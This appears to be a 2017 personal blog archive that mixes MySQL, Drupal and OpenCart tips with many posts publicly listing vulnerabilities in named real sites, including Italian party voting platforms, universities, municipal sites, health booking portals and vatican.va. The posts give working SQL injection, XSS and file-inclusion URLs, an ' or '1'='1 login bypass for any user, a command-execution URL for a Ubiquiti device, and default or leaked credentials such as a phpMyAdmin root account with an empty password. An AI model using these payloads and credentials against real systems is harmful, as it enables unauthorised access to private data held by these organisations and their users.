
Showing posts from 2017

[FIX] ERROR 1436 (HY000) Thread stack overrun - mysql 5.7

How to fix Thread stack overrun with MySQL 5.7 (and other versions)

Thread stack overrun with MySQL 5.7 on Linux and Windows

Run the server with:

    mysqld --thread_stack=256k

To configure it in my.ini/my.cnf (server.cnf), add:

    thread_stack = 256K

Further problems with MySQL on Windows

On 64-bit Windows you will probably need to give a bigger value. I've been forced to use thread_stack = 512K on MySQL Ver 5.6.38 for Win64 on x86_64 (MySQL Community Server (GPL)).

Generic errors with mysql_upgrade:

    ERROR 1436 (HY000) at line 1879: Thread stack overrun
    ERROR 1436 (HY000) at line 1935
    Use 'mysqld --thread_stack=#' to specify a bigger stack

How to log all the queries in mysql or mariadb - windows and linux

Log all your SQL queries on a MySQL server

Note: use this only on your test server and without a lot of workload or connections, otherwise you are going to fill all your disk space or exhaust the IO resources (and even raise the CPU load while waiting for IO writes).

Make sure that your logs folder exists and use the same folder as the other MySQL logs (e.g. /var/log/mysql/).

Add to your my.ini/my.cnf (or server.cnf):

On Windows:

    general_log_file="C:/yourWindowsMysql/logs/logsql.log"
    general_log=1

On Linux/*nix:

    general_log_file="/var/log/mysqld-queries.log"
    general_log=1

Then restart your MySQL or MariaDB server.

https://www.movimento5stelle.it again | several vulnerabilities, system compromise

Old vulnerabilities and other information. The main website shares the same problems as http://rousseau.movimento5stelle.it.

NOTE/Disclaimer: if you suppose you are voting in a safe manner (it's less safe than the cheapest Italian service provider with an old version of commonly used scripts, like WordPress or Joomla, installed by your "cousin"), I can tell you without problems that you are wrong and you've been tricked by your own leaders. I'm not responsible for what they are saying and doing ... you are. The server mostly hasn't been updated for years, except for just what they thought was worth updating.

Please, do not contact me for legal issues. I haven't saved/stored and I do not share any particular *confidential* information. I've nothing to do with any problem that you are facing on those websites. No, I'm not "politically attacking" anybody. Those, that you are probably supposing, are political speculations from your re

Reggia di Caserta - SQL Injection, system compromise, xss, etc | http://www.reggiadicaserta.beniculturali.it

Joomla 1.5.15 (vulnerable): http://www.reggiadicaserta.beniculturali.it
Archive.org: https://web.archive.org/web/20170426095201/http://reggiadicaserta.beniculturali.it:80/

They moved to: http://www.reggiadicaserta.beniculturali.it/Joomla/
Path: /var/www/reggiadicaserta

They also have malware (search the source code for http://www.freepokermoney.net or similar URLs):
http://www.reggiadicaserta.beniculturali.it/Joomla/index.php?option=com_content&view=article&id=1434:codice-di-comportamento-dei-dipendenti-delle-pubbliche-amministrazioni&catid=212:organico-contatti&Itemid=886
Archived page: http://archive.is/3JJsi

WordPress 4.8.3 (with bogus plugin and theme): http://www.reggiadicaserta.beniculturali.it/wp/

The WordPress version is the "new" website, and they also "devastated" the already bad (with malware) SEO optimization by not redirecting URLs. I feel very sorry for that. What a mess.

How to fix drupal installation with 32bit php version

Install Drupal on a server with a 32-bit version of PHP.

If you want to install Drupal on your TEST server even if you have a 32-bit version of PHP, you need to edit core/modules/system/system.install and comment out (around line 973):

    if (PHP_INT_SIZE <= 4) {
      $requirements['limited_date_range'] = [
        'title' => t('Limited date range'),
        'value' => t('Your PHP installation has a limited date range.'),
        'description' => t('You are running on a system where PHP is compiled or limited to using 32-bit integers. This will limit the range of dates and timestamps to the years 1901-2038. Read about the <a href=":url">limitations of 32-bit PHP</a>.', [':url' => 'https://www.drupal.org/docs/8/system-requirements/limitations-of-32-bit-php']),
        'severity' => REQUIREMENT_WARNING,
      ];
    }

It's highly suggested to update to a recent 64bit ver

unina.it/ | blind sql injection, xss, data leak, system compromise etc

There's a sort of WAF on all the websites, but it can be easily tricked by not using the most common terms like /passwd, etc.

- http://www.dieti.unina.it
Ubuntu, Joomla 2.5.8
Admin can be changed (admin takeover) even if there's an external login for the users.
PHP files can be uploaded via administrator/components/com_media/helpers/media.php
com_gcalendar is vulnerable and should be upgraded to dpcalendar.
---
http://www.digita.unina.it/
WordPress 4.8.1
http://www.digita.unina.it/digita/wp-login.php
sds_dj32f lizzi
---
http://www.elettrotecnica.unina.it/grupponazionale/vedirisorsa.php?ID=[blind sql]
Archived error: http://archive.is/Zw3Ua
/home/httpd/elettrotecnica/grupponazionale/
---
XSS
http://www.comeallacorte.unina.it/ediz_precedenti.php?ediz=2007-2008%3Cscript%3Ealert(document.cookie);%3C/script%3E
---
SQL Injection
http://www.filclass.unina.it/dett_news.php?news_id=[SQL Injection]62&area_id=7
Sample error archived: http://archive

sefsas.it | sql injection

SQL injection in the email confirmation URL (there are several others):
http://bandi.sefsas.it/v3/store/actmail.asp?ida=[reg id]&cod=[sqlinjection]&idc=[customer id]
e.g.: http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod='&idc=9999
Archived: http://archive.is/kwwXf

Full query sample in the output:
http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod=7913694013691841369169&idc=9999

    SELECT AFFILIATE_ID, IDCUSTOMERTYPE, NAME, LASTNAME, EMAIL, CUSTOMERCOMPANY, ACTIVITY_ID, REGION_ID FROM CUSTOMERS WHERE IDCUSTOMER=9999 AND REMIP=''

Archived: http://archive.is/xDVeh

XSS
https://www.farmadelta.it/ricerca-farmaci.html?strpro=11111"><script>alert(document.cookie);</script>
SQL Injection
https://www.farmadelta.it/pagina2.asp?pag=cat2&cat=275'&strcat=Animali%20Domestici
Archived error: http://archive.is/9bJfo

Wordpress <=4.8.3 - how to raise errors and (possibly) get the path + [FIX]

Simple fix (add at the top of each file so it exits when called directly):

    if ( ! defined( 'ABSPATH' ) ) exit;

_________

URLs that can give you errors with local folder paths on WordPress 4.8.3 and previous versions:
/wp-includes/customize/class-wp-customize-background-image-control.php
/wp-includes/customize/class-wp-customize-background-image-setting.php
/wp-includes/customize/class-wp-customize-background-position-control.php
/wp-includes/customize/class-wp-customize-color-control.php
/wp-includes/customize/class-wp-customize-cropped-image-control.php
/wp-includes/customize/class-wp-customize-custom-css-setting.php
/wp-includes/customize/class-wp-customize-filter-setting.php
/wp-includes/customize/class-wp-customize-header-image-control.php
/wp-includes/customize/class-wp-customize-header-image-setting.php
/wp-includes/customize/class-wp-customize-image-control.php
/wp-includes/customize/class-wp-customize-media-control.php
/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php
/wp-includes/custo

Linux Day 2017 Guardia Sanframondi - various stuff discovered

During the Linux Day 2017 at Guardia Sanframondi I played with my phone on the local network ... with the browser (and Google to get information on vulnerabilities).

-Linuxday wifi-

daloRADIUS default password
user: administrator
password: radius
admin/admin
IP: 192.168.1.249
http://192.168.1.249

Ubiquiti device (wifi antenna/AP)
IP: 192.168.1.20
Unauthenticated command execution
https://192.168.1.20/pingtest_action.cgi?command=[anyshellcommand]

http://www.comuneguardiasanframondi.gov.it | SQL Injection, file/shell upload, system compromise

Joomla com_fabrik vulnerabilities

Raise the error related to SQL injection:
http://www.comuneguardiasanframondi.gov.it//index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
Archived: http://archive.is/1Up6B

Upload vulnerability:
http://www.comuneguardiasanframondi.gov.it/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0
Archived: http://archive.is/6XtTl

Path (leaked from the errors): /web/htdocs/www.comuneguardiasanframondi.gov.it/

Poste Italiane - PT100SV multi-purpose franking machine (Elettronica Meccanica Sistemi S.P.A.) - operator's manual

PT100SV Software Manual, Release A8C6

Download the manual here:

Mirrors:
filefactory.com: http://www.filefactory.com/file/1u1o3fex14vt/pt100sv-manuale-operatore_MultiUpload.biz.pdf
share-online.biz: http://www.share-online.biz/dl/GRQZM4YOUSV
sendmyway.com: https://www.sendmyway.com/bgktennfvwqz
gigapeta.com: http://gigapeta.com/dl/7495857a6745dc

http://lesim1.ing.unisannio.it |path disclosure, xss, sql injections, shell upload

http://lesim1.ing.unisannio.it

We can start by detecting the version manually (automated tools, like joomscan, give random values) from http://lesim1.ing.unisannio.it/configuration.php-dist: 1.5.x
Archived: http://archive.is/VB6I3

libraries/joomla/crypt/index.html is missing, so it's probably before Joomla! 1.5.26.
components/com_mailto/helpers/index.html is missing, so it's probably before Joomla! 1.5.23.
(Tip: I just used file and folder comparison with Beyond Compare, but you can also use Meld on Linux.)

To get the path we try to raise errors with wrong SQL queries. In this case we are abusing the weblinks component and adding filter_order even if the site uses SEF URLs (who cares).
http://lesim1.ing.unisannio.it/index.php/it/link-mee/53-gruppi-di-ricerca-mee-delle-universita-italiane-?&filter_order=
to get an output like this:

    No valid database connection Unknown column '0' in 'order clause' SQL=SELECT * FROM jos_weblinks WHER

http://www.orientamento.unisannio.it | path disclosure, xss, sql injections, shell upload, system compromise

http://www.orientamento.unisannio.it

The website uses PHP-Nuke with some customizations (sometimes it detects that we are trying to abuse specific bugs).

We can find the path from the Deprecated notices in various modules: /var/www/html/copus/home/copus/modules/
e.g.: http://www.orientamento.unisannio.it/modules.php?name=Stories_Archive

    Deprecated: Function ereg() is deprecated in /var/www/html/copus/home/copus/modules/Stories_Archive/index.php on line 25

register_globals seems to be On and the variables can be replaced by using POST/GET requests.
Supposed version <= PHP-Nuke 6.9, since banners.php exists.

In banners.php we have switch($op) { ... }
Sample: http://www.orientamento.unisannio.it/banners.php?op=login

By using, for example, this URL:
http://www.orientamento.unisannio.it/banners.php?op=Ok&login=[Sqlinjection]&pass=abc
the SQL is executed and we can dump the data instead of the banners.

File via SQL: http://www.orientamento.unisannio.it/banners.

cineca.it | XSS

http://accordi-internazionali.cineca.it/accordi.php?continenti=%&paesi=%&univ_stran=%&univ_ita=C4&anni=[XSS]&btnSubmit=Cerca
e.g.: http://accordi-internazionali.cineca.it/accordi.php?continenti=%&paesi=%&univ_stran=%&univ_ita=C4&anni=<script>alert(document.cookie);</script>&btnSubmit=Cerca
Archived with sample JavaScript text: http://archive.is/To5A4

http://www.carminevalentino.it/ | xss

http://www.carminevalentino.it/

The path can be seen in the 404 error pages: D:\inetpub\webs\carminevalentinoit\

XSS
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg[XSS]&pg=1
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);alert(%22xss;&pg=1

and we can place any video in the content. Example:
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);s1.addVariable(%22file%22,%22http://flashedu.rai.it/raistoria/RES/16_06_1977.mp4%22);//&pg=1
Shortened URL: https://goo.gl/sWhg1P
Archived URL: http://archive.is/25Bw8

http://www.tourism-solutions.tech/ | xss - system compromise

http://www.tourism-solutions.tech is usually sending spam emails. There's a fake unsubscribe script that reports the removal of anything, even if you add a simple XSS:
http://www.tourism-solutions.tech/unscribe.php?id=%3Cscript%3Ealert('xss');%3C/script%3Eyourmail.com

____

The mail server can be exploited with an old remote exploit for Postfix on Debian Linux (Shellshock).

hacksannio.it (... other websites) | path disclosure, system compromise

By simply using the theme URL http://www.hacksannio.it/wp-content/themes/betheme/ we can raise an error:

    Fatal error: Uncaught Error: Call to undefined function get_header() in /web/htdocs/www.hacksannio.it/home/wp-content/themes/betheme/index.php:10 Stack trace: #0 {main} thrown in /web/htdocs/www.hacksannio.it/home/wp-content/themes/betheme/index.php on line 10

_______________

Update: after getting the possibility to execute code, it's possible to locally escalate to root privileges (expl. openrestinpeace) and cause a local DoS.

There are several other websites on the server.

w2.vatican.va photovat.com | XSS, path disclosure

Simple XSS
http://w2.vatican.va/content/francesco/it/events/event.dir.html/content/vaticanevents/it/2017/4/229%3Cimg%20src=%22a%22%20onerror=%22alert('xss')%22%3E

_____________________________________

Adobe Experience Manager CMS
A proxy is needed to connect, since they probably limited the access to a range of IPs -> Sample working proxy: 5.152.158.4:8080
Admin access: https://w2.vatican.va:4502/admin
SSL verification must be disabled (OCSP on Firefox).
Update: it's possible to access

_____________________________________

Other websites
http://player.rv.va/rv.player01.asp?language=it&AudioLanguage=ita&visual=Tv&nocontrols=tr%27ue&fullframe=true&width=640&height=360%22%3E%3Cimg%20src=a%20onerror=alert(%221%22)%3E%3C%22&autoplay=true

_____________________________________

http://www.photovat.com
IIS server: D:\inetpub\webs\photovatcom

https://www.movimento5stelle.it | xss, stored xss, session theft, scripts errors, data leak, remote file inclusion, system compromise

https://www.movimento5stelle.it/cgi-bin/mt-4/mt-cp.cgi

File Inclusion
dodosmail.php is a bogus contact email script.
http://www.movimento5stelle.it/parlamento/segnalazioni.html
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=[any local file]
Example: http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=eventi.html
Archived page that shows the inclusion of an HTML page available on the server: http://archive.is/vHgOn
Archived source of the Movable Type CGI (a bogus obsolete version used on the website): http://archive.is/20Uen
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=../../../cgi-bin/mt-4/mt.cgi

The script can be triggered to show errors and the path:

    Warning: array_keys() expects parameter 1 to be array, null given in /home/httpd/html/casaleggio/beppegrillo.it/beppegrillo/movimento/parlamento/dodosmail.php on line 58

XSS
There are various XSS and stored XSS in the profil

https://iscriviti.radicali.it | errors, path disclosure, system compromise

https://iscriviti.radicali.it

Directly accessing this URL we get an error with the paths:
https://iscriviti.radicali.it/Landing/RegistraDati
D:\xampp\htdocs\radicali\landing_iscrizione\index.php

They are using Windows and XAMPP, which are not the best solution for a production server that should store sensitive data. The PHP scripts use the CodeIgniter framework.
The archived error page: http://archive.is/PFw55

Access to phpMyAdmin: https://iscriviti.radicali.it/phpmyadmin/ user: root password: ""
FTP: iscriviti.radicali.it user: root password: ""
Update: it's not working anymore.

www.leganord.org | various security issues

Vulnerable Phocadownload
Possibility to add different videos from YouTube:
www.leganord.org/index.php/documenti-politici/68-gianfranco-miglio/8741-quella-rivoluzione-dal-basso?videoid=[youtube video id]

They also have malware (not from me - a lot of porn stuff).
Google Cache: http://webcache.googleusercontent.com/search?q=cache:r0-Y-VR0oHAJ:www.leganord.org/xIpV58pu_+&cd=11&hl=it&ct=clnk&gl=it
Copy of the cached page: http://archive.is/7Vhy9

Note: they fixed the problems.

https://margot.partitodemocratico.it - path disclosure, system compromise

There is a path disclosure thanks to an error:
https://margot.partitodemocratico.it/nl/cancellami.php?e=test&secure=test
unsubscribe_v2.php
https://margot.partitodemocratico.it/pdnl/nl3/vogliodareunamano.php?id=[anything]&question=[anything]&answer=[anything]&e=[anything]&secure=[anything]&mid=[anything]
(original sample: https://margot.partitodemocratico.it/pdnl/nl3/vogliodareunamano.php?id=2&question=2&answer=si&e=ZWxpb3BvbGlAdGlzY2FsaS5pdA&secure=04912b36dcc08f33892266834a963bf0&mid=1eea )

It's possible to have access to the system. Is it an "honeypot" ... as stated in the path? It's possible, but they didn't fix the bugs and it's possible to access confidential data.
/repository/GCloud-WebRoot/margot.partitodemocratico.it/pd_margot_honeypot/

Content Models html5

Content Models

Metadata: content that sets up the presentation or behavior of the rest of the content. These elements are found in the head of the document.
Elements: <base>, <link>, <meta>, <noscript>, <script>, <style>, <title>

Embedded: content that imports other resources into the document.
Elements: <audio>, <video>, <canvas>, <iframe>, <img>, <math>, <object>, <svg>

Interactive: content specifically intended for user interaction.
Elements: <a>, <audio>, <video>, <button>, <details>, <embed>, <iframe>, <img>, <input>, <label>, <object>, <select>, <textarea>

Heading: defines a section header.
Elements: <h1>, <h2>, <h3>, <h4>, <h5>, <h6>, <hgroup>

Phrasing: This model has a number of inline level element

Opencart 2.x - save settings for module or add module to layout

    // loading the settings
    $this->load->model('setting/setting');
    $setting = $this->model_setting_setting->getSetting('mymodule');

    // saving the settings: editSetting() takes the module code and the data array
    // (here the submitted form), and returns nothing
    $this->load->model('setting/setting');
    $this->model_setting_setting->editSetting('mymodule', $this->request->post);

NOTE: in the form the input name="" must start with the name of the module. Example: mymodule_limit, mymodule_status, mymodule_othersetting

    // getting data from the module - usually it is loaded by the configured layout
    $this->load->model('extension/module');
    $setting = $this->model_extension_module->getModuleByCode('mymodule');

    // saving data for the module with a new id from the POST (saves a new one that can be loaded from the layout)
    $this->load->model('extension/module');
    if (!isset($this->request->get['module_id'])) {
        // $this->model_extension_m

Any cupweb by engineering - ex. https://www.aslbenevento1.it/ | SQL Injection.

https://www.aslbenevento1.it/cupweb/
https://service.sanita.padova.it/cittadino/
https://lpweb.asl3.liguria.it/cupweb/
https://cup.ospedalerc.it/cupwebrc/mainLogin.do | error with LDAP

Ver. 20.11.00_003 28/04/17

a' or '1'='1 in username and password to access as SGPWeb Operatore

If we raise an error:

    errore di accesso al Data Base: ORA-01756: quoted string not properly terminated : SELECT password,description,user_code,connectingdate,users.sco_id from

----2021-11-05----
There is still an XSS in the login (it's not a big issue).

http://www.beppegrillo.it https://rousseau.movimento5stelle.it | sql injection system compromise

A simple SQL injection is needed to login as *any* user, example: ' or '1'='1.
https://rousseau.movimento5stelle.it/login.php

SQL injection where sharing_id is a table in the GROUP BY clause:
https://rousseau.movimento5stelle.it/edit_atto.php?id=1258&sharing_id=[sqli]

http://www.beppegrillo.it/marcia_virtuale/vmarcia/auslesen.php?start=14040&z=[sqli]

"Fixed" - Update 09/08/2017:

They removed the "Marcia virtuale" page and the PHP file that exposed the data in clear text from BeppeGrillo.it ( https://t.co/3FeUPiHQ8E ) pic.twitter.com/8abp2ItTxa
— David Puente (@DavidPuente) 9 August 2017

I accidentally found (August 2018) an archived page (I didn't archive it!) that shows sensitive information without an SQLi. Probably the page was tampered with by someone or the script itself didn't work correctly.
https://archive.li/cmKkC - sample for the voting system: voting_votazioni voting_votazioni_vote

The main website als

one.com webcluster-ssl2.webpod5-cph3.one.com | mysql database and data dump.

webcluster-ssl2.webpod5-cph3.one.com